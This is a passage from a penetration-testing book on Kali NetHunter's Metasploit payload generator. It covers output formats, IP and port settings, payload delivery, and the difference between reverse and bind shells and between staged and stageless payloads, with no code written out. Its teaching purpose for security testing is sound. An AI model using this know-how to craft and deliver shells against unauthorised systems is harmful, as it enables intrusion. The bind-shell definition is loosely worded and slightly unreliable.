Hands-On Penetration Testing with Kali NetHunter
上QQ阅读APP看书,第一时间看更新

The Metasploit Payload Generator

One of the most challenging phases in penetration testing is the Exploitation or the Gain Access phase. Sometimes a penetration tester may use an existing exploit within the Metasploit Framework (MSF); however, if the target system is patched to prevent such an attack, the exploit will most likely fail. Within the MSF is the msfvenom payload-generator utility, which allows a penetration tester to create customized payloads.

The Metasploit Payload Generator allows a penetration tester to easily create payloads using the following options:

  • Output type such as ASP, Bash (.sh), PHP, Powershell (.ps1), Python (.py), Windows (.exe), and so on. This feature allows a payload to be crafted for a specific platform.
  • Set both the IP address and Port number.
  • Payload options can be the default MSF format or the command prompt (CMD).

The following is the interface for the Metasploit Payload Generator on Kali NetHunter, we can see the various options available to us and how simple it is to create a payload using this application. Upon completion, the payload can be sent to our local storage on our Android device or to an HTTP address:

The created payloads can be in the following form:

  • Reverse or Bind: The victim's terminal (shell) is sent back to the attacker when compromised, this is known as a reverse connection. A bind shell happens when an attacker successfully compromises a target system, a shell it automatically obtains.
  • Staged or stageless: In a stage payload, the exploitation happens in stages. The attack sends an initial payload to the target system; once compromised, the remainder of the payload is downloaded onto the victim's system. In a stageless payload, a single payload is crafted with all of its functions and is sent to the potential victim.